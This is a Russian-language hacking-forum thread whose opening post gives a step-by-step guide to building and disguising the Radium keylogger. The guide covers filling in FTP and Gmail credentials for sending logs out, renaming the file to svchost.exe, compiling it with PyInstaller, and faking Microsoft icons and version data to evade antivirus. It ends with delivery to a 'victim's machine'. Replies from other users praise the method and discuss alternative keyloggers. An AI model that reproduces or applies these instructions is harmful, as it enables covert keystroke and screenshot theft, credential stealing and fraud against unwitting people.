• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Описание Общедоступный непалящийся кейлоггер


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Очередной мануал по создании кейлоггера из говна и палок.
Источник: lwplxqzvmgu43uff.onion
Автор:XZer0
Палевность и работоспособность не проверялась.

Сегодня, детишки мои, я расскажу вам сказку. Я как всегда решил совместить приятное с полезным. Один хороший знакомый, продавец rdp дедиков, учеток и прочего, долго жаловался мне на то, что иногда после продажи он заходил на свой дедик и видел окна браузера с крупными переводами в киви и др. До того как он успевал что то сделать продавец естественно успевал либо удалить историю либо завершить перевод на другой кошелек (и т.д.). Мне надоело выслушивать его темные помыслы и я решил ему помочь. Заодно и другим участникам этого форума. У нас неоднократно уже обсуждалось что то вроде: "А не принесет ли кто на блюдечке кейлогер и т.д. не детектящийся антивирусами.". Сразу оговорюсь, что я пошел путем наименьшего сопротивления и решил долго не думая пошарить на гитхабе. Среди всего разнообразия вариантов нашелся и Radium Keylogger написанный на python2.7. После непродолжительного гугления выяснилось, что он широко обсуждался и публиковался на новостных сайтах чак что его описание и возможности лучше почитать там. Казалось бы что его сигнатуры уже как пол года должны быть в антивирусных базах. Но как выяснилось не тут то было. Постараюсь описывать как можно подробнее, как раз для категории лиц "подайте мне готовенькое".

Что нам понадобится?
1. Гуглим название "Radium Keylogger" и качаем все с гитхаба, распаковываем в рандомную папку.
2. Гуглим "Python2.7 скачать бесплатно без смс в высоком качестве" загружаем и устанавливаем с параметрами по умолчанию, единственное о чем хотелось бы сказать, что нужно выбрать ВСЕ компоненты для установки в окне выбора компонентов для установки соответственно. В противном случае вас ждут проблемы, не буду описывать подробностей.
3. Так же все загружаем и устанавливаем оттуда же, со страницы Radium Keylogger на гитхабе из раздела Requirements (PyHook; PyWin32; Microsoft Visual C++ Compiler for Python) кроме PyInstaller. Его мы установим ручками в следующем шаге.
4. Открываем PowerShell от имени администратора. Далее переходим в папку с распакованными исходниками с помощью команды

Код:
cd С:\полный\путь\до\ исходников

Потом выполняем комманду

Код:
pip install pyinstaller

так же следом установим рекомендованные пакеты

Код:
pip install -r .\requirements.txt

5. Открываем исходник Radiumkeylogger.py в вашем любимом текстовом редакторе можете хоть в Word.
Ищем строки

Код:
ip = base64.b64decode("")   #IP to connect to FTP server адрес или домен ФТП сервера.
ftpkey = base64.b64decode("")   #FTP password Пароль от ФТП сервера.
ftpuser = base64.b64decode("")  #FTP username Имя пользователя ФТП сервера.
passkey = base64.b64decode("")  #Password to connect to GMAIL smtp server Пароль от почты.
userkey = base64.b64decode("")  #Username to connect to GMAIL smtp server Имя пользователя.

из названия не трудно догадаться что для чего. Но все же скажу что нужно сделать. Заменяем значения вида base64.b64decode("") на просто тупо "ваше значение". Если не лень можете сконвертировать ваши данные в кодировку base64 с помощью любого онлайн конвертера и прописать значение в кавычки между скобок.
6. Пройдемся по исходнику и для порядка и маскировки поправим везде где упоминается "AdobePush.exe" на "svchost.exe". Так же заменим "Radiumkeylogger.py" и "AdobePush.py" на svchost.exe для обеспечения работоспособности автозагрузки.

7. Компилируем все в исполняемый файл, в том же окне PowerShell
выполняем команду

Код:
pyinstaller --onefile --windowed Radiumkeylogger.py

Если вы все делали правильно в папке с исходниками появится пара папок. В папке dist и будет ваш долгожданный кейлогер. Весит сие чудо 9100Kb. Что очень печально для малвари должен я сказать, но ничего не поделаешь, я не стал заморачиваться ибо не для себя. Тем более, что стандартный svchost иногда и все 50Mb отжирает и если он будет весить 20Kb может вызвать подозрение у опытного пользователя.
8. На этом еще не все, с паковкой и криптом можете сами заморочиться, мы сейчас же произведем базовую маскировку. Качаем и устанавливаем программы VerPatch и Resource Hacker. Для вашего удобства выбрал самое общедоступное.
9. Переименовываем получившийся файл в svchost.exe. Открываем с помощью Resource Hacker библиотеку /Windows/system32/imageres.dll и сохраняем все ее ресурсы в какую либо папку, думаю с функционалом этой программы вы разобраться в состоянии. Далее открываем наш кейлогер и заменяем его иконку на 15.ico это стандартная иконка для приложений внутри которых нет ресурсов, с этой же иконкой и отображаются основные системные процессы Windows. Сохраняем и выходим.
10. Копируем наш файл в папку с распакованным VerPatch. Открываем командную строку и переходим в эту папку. Выполняем команду

Код:
verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"

Если система с российской локалью замените "Host Process for Windows Services" на Хост процесс для сервисов Windows" или как там мать ее.
После этого наш кейлогер будет палиться только тем что запущен от имени пользователя. Впрочем и эту проблему можно легко решить погуглив пару минут.
11. Все. Можно запускать и проверять электронную почту, после запуска должно придти уведомление на электронную почту что все ОК. Хотелось бы предупредить, что логи отправляются по умолчанию после набора 300 символов скриншоты после набора 500 символов, скриншоты пакуются по 10 штук и отправляются на почту как и логи. Естественно покопавшись ручками в исходнике все значения можно заменить под ваши требования.
Профит

1.png
2.png
3.png
4.png
5.png

Как вы видите он не детектится основными антивирусами лишь только какими то совсем экзотическими. Вам остается только решить вопрос доставки его на машину жертвы, но это уже совсем другая история.
 

Indy

Уважаемый пользователь
Форумчанин
Регистрация
21.01.2015
Сообщения
277
Репутация
105
> Весит сие чудо 9100Kb.

Вот как сейчас малварь пилят. Если через час оно начнёт детектится(да и никакая проактивка не даст заюзать гуй-хуки), то это конец для данного семпла. Одноразовое как презерватив.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
> Весит сие чудо 9100Kb.

Вот как сейчас малварь пилят. Если через час оно начнёт детектится(да и никакая проактивка не даст заюзать гуй-хуки), то это конец для данного семпла. Одноразовое как презерватив.
Смотря как настроена, это не единственных кейлоггер, есть также паблик кейлоггеры локального действия, непомню к сожалению даже тут на форуме валялся исхходник на асме, смысл такой, что это кейлоггеры локального действия, они собирают логи в папку и больше ничего не делают, ав такие штуки не детектят, считая их "Коммерческими кейлогерами" !

Вот штука например такая:

Попробуйте там хоть и гуй, но каспер пропустит, также проверял и на езет нод, др. веб ! :)

Там правда минус, что логи неотсылает по сети, но сделать пересылку самим думаю нетак сложно, по крайне-мере легче чем делать сам кейлоггер !Dmeh-Smeh-Smeh!!!

В принципе статья боевая, можно подыскать кейлоггеры с меньшим весом и исходники к ним, в остальном примерно так и действовать как в статье...like it
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Но зачем же на VirusTotal чекать... эх...
Если есть азы программирования на си или асме, то посмотри исходники кейлогеров, там даже если знания среднии, т.е. мало опыта в кодинге, все-равно думаю непроблема сделать кейлоггер локального действия, даже видел и на делфи неплохие...

Далее каким-нить хитрым способом пересылать логи, пусть даже скриптом тоже несложно...

Итого часов 3-5 работы для профи и ну максимум неделю для кодера со среднем уровнем знаний, доработка такого софта уже меньше времени занимает !

ИМХО !
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Не знаю, стоит ли заниматься копипастой с общеизвестных ресурсов. К примеру статейка в шапке прогугливается только на источнике и здесь, а с популярных наверное никакого выхлопа не будет.
Хоть это и не политкорректно кидать прямые ссылки на борды похожей тематики, но...
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Хорошая статья, только имхо кейлогеры лучше делать на си или асме, можно и на делфи даже, имхо !

По пречине, что дот нет, это сильно платформозависимый язык, и например если будет какая-то другая дот нет установлена у жертвы, то могут-быть проблемы !

Хотя сама статья мне понравилась, автор все хорошо расписал, молодец, ну и может я сторонник старой школы, что предпочитая какие-то другие средства разработки, нежели дот нет !
 
Верх Низ